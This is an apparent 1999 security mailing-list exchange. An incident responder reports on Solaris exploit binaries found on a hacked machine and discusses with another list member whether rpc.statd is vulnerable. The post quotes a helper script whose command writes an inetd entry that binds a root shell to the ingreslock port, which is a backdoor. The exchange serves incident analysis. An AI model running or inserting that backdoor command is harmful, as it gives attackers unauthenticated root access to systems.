I found two binary-only exploits on a hacked machine. The one of most
interest was "amexp" which when executed without arguments presents
the following:
Usage: ./amexp address cache command type [port]
Further help:
address - system address
cache - system hostname
command - execute this command
type - 0: Solaris 2.5.1 stock,
1: Solaris 2.5.1 patched, 2.6 & 2.7
port - optional port to bypass portmapper
A shell script that was included was "go.amexp" which contained:
./amexp $1 $2 "echo 'ingreslock stream tcp nowait root /bin/sh sh' >
/tmp/.xp;/usr/sbin/inetd -s /tmp/.xp" $3
The command is nearly identical to what is used for both tooltalk and
rpc.cmsd attacks
The proper patches were installed and I do not believe that it is the
statd/automountd exploit since
no indirect rpc services execution was attempted.
This incident is closed.
----- Original Message -----
From: Tabor J . Wells <[EMAIL PROTECTED]>
To: Bob Todd <[EMAIL PROTECTED]>
Cc: <[EMAIL PROTECTED]>
Sent: Tuesday, August 24, 1999 1:52 PM
Subject: Re: Vulnerability in Solaris 2.6. rpc.statd ?
> On Sat, Aug 21, 1999 at 12:31:18PM -0400,
> Bob Todd <[EMAIL PROTECTED]> is thought to have said:
>
> > While performing an on-site incident response at
> > _______, I found several
> > Solaris-oriented exploit programs including a
> > statd2.6 (others were calendar
> > manager, tooltalk, and lockd?). Since there is an
> > exploit program for statd on
> > Solaris 2.6, I could conclude that Solaris 2.6
> > statd is vulnerable to attack. I
> > have not tried the exploit, but since the machine
> > was probably compromised
> > by one of these programs, the threat seems real!!
>
> And did this server have the statd patch installed (106592-02 on
sparc and
> 106593-02 on x86)? Did it have the various security patches for the
other
> services mention installed as well?
>
> Perhaps the program was part of the exploit which allowed indirect
RPC
> calls with statd that was discussed here (and elsewhere) several
weeks
> back.
>
> I don't think your conclusion is supported given the information you
> provided. Perhaps you could provide more information about the
exploit
> before rushing to claim that there is a new vulnerability.
>
> Tabor
>
> --
>
______________________________________________________________________
__
> Tabor J. Wells
[EMAIL PROTECTED]
> Technology Manager
http://www.smarterliving.com
> Smarter Living, Inc. It's your time. It's your
money.
>
